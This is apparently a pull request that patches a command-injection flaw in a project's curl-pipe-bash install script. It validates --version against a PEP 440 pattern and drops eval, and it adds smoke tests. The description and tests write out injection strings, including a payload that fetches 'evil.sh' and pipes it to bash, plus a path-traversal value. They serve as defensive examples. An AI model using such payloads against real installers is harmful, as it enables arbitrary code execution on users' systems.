### PR TITLE
fix(install): validate --version arg and drop eval to prevent command injection (security P0)

### DIFF
--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -48,12 +48,18 @@ while [[ $# -gt 0 ]]; do
   esac
 done
 
+if [[ -n "$VERSION" ]]; then
+  if ! [[ "$VERSION" =~ ^[0-9]+(\.[0-9]+){0,3}((a|b|rc)[0-9]+|\.post[0-9]+|\.dev[0-9]+|\+[A-Za-z0-9.]+)?$ ]]; then
+    die "--version must be a PEP 440-style version (e.g. 2026.04.25.1)"
+  fi
+fi
+
 # Wrapper: in dry-run mode, print the command instead of running it.
 run() {
   if [[ "$DRY_RUN" == true ]]; then
     printf "  [dry-run] %s\n" "$*"
   else
-    eval "$@"
+    "$@"
   fi
 }
 
@@ -86,21 +92,21 @@ install_autosearch() {
   # uv tool install (best: isolated, cross-platform, fast)
   if command -v uv &>/dev/null; then
     info "Installing via uv..."
-    run "uv tool install '$PKG_SPEC' --quiet" && success "Installed via uv ($PKG_SPEC)" && return 0
+    run uv tool install "$PKG_SPEC" --quiet && success "Installed via uv ($PKG_SPEC)" && return 0
   fi
 
   # pipx (also isolated, widely available)
   if command -v pipx &>/dev/null; then
     info "Installing via pipx..."
-    run "pipx install '$PKG_SPEC'" && success "Installed via pipx ($PKG_SPEC)" && return 0
+    run pipx install "$PKG_SPEC" && success "Installed via pipx ($PKG_SPEC)" && return 0
   fi
 
   # pip with Python 3.12+
   PYTHON=$(find_python || true)
   if [ -n "$PYTHON" ]; then
     info "Installing via pip ($PYTHON)..."
-    run "'$PYTHON' -m pip install --quiet --upgrade --break-system-packages '$PKG_SPEC' 2>/dev/null \
-      || '$PYTHON' -m pip install --quiet --upgrade '$PKG_SPEC'"
+    run "$PYTHON" -m pip install --quiet --upgrade --break-system-packages "$PKG_SPEC" \
+      || run "$PYTHON" -m pip install --quiet --upgrade "$PKG_SPEC"
     success "Installed via pip ($PKG_SPEC)" && return 0
   fi
 

--- a/tests/smoke/test_install_script.py
+++ b/tests/smoke/test_install_script.py
@@ -1,0 +1,44 @@
+import subprocess
+from pathlib import Path
+
+
+ROOT = Path(__file__).resolve().parents[2]
+INSTALL_SCRIPT = ROOT / "scripts" / "install.sh"
+
+
+def run_install_script(*args: str) -> subprocess.CompletedProcess[str]:
+    return subprocess.run(
+        ["bash", str(INSTALL_SCRIPT), *args],
+        capture_output=True,
+        text=True,
+        timeout=30,
+        check=False,
+    )
+
+
+def test_install_script_dry_run_accepts_valid_version() -> None:
+    result = run_install_script("--dry-run", "--version", "2026.04.25.1")
+    combined_output = result.stdout + result.stderr
+
+    assert result.returncode == 0, combined_output
+    assert "autosearch==2026.04.25.1" in combined_output
+
+
+def test_install_script_rejects_injected_version_without_execution() -> None:
+    result = run_install_script(
+        "--dry-run",
+        "--version",
+        "2026.04.25.1'; echo PWNED >&2; #'",
+    )
+    combined_output = result.stdout + result.stderr
+
+    assert result.returncode != 0
+    assert "PWNED" not in combined_output
+
+
+def test_install_script_rejects_path_traversal_version() -> None:
+    result = run_install_script("--dry-run", "--version", "../../etc/passwd")
+    combined_output = result.stdout + result.stderr
+
+    assert result.returncode != 0
+    assert "PEP 440-style version" in combined_output


### PR DESCRIPTION
## Summary

`scripts/install.sh` (the public `curl | bash` install path) had a command-injection vulnerability via `--version`:

```
VERSION="$2"                       # no validation
PKG_SPEC="autosearch==$VERSION"    # raw interpolation
run "uv tool install '$PKG_SPEC' --quiet"   # passed as one string
run() { ...; eval "$@"; }          # eval'd
```

A version like `1.0.0'; curl evil.sh | bash; #'` would break out of the single-quoted spec and run arbitrary commands. Real supply-chain attack vector.

## Fix

1. **Validate `VERSION`** against a PEP 440-style allowlist (digits, dots, optional pre/post/dev tag, optional +local) right after argument parsing. Rejects quotes, semicolons, `$`, spaces.
2. **Drop `eval`**. `run()` now uses argv-array form (`"$@"`); each callsite (uv / pipx / pip) passes args as separate tokens. Dry-run printing preserved.

## Test plan

- [x] `tests/smoke/test_install_script.py` — 3 cases:
  - valid `--version 2026.04.25.1` succeeds, output mentions `autosearch==2026.04.25.1`
  - injected `--version "1.0.0'; echo PWNED; #'"` rejected, `PWNED` never appears in output
  - path-traversal `--version "../../etc/passwd"` rejected
- [x] Full pytest 913 passed
- [x] Release gate PASSED
- [ ] CI green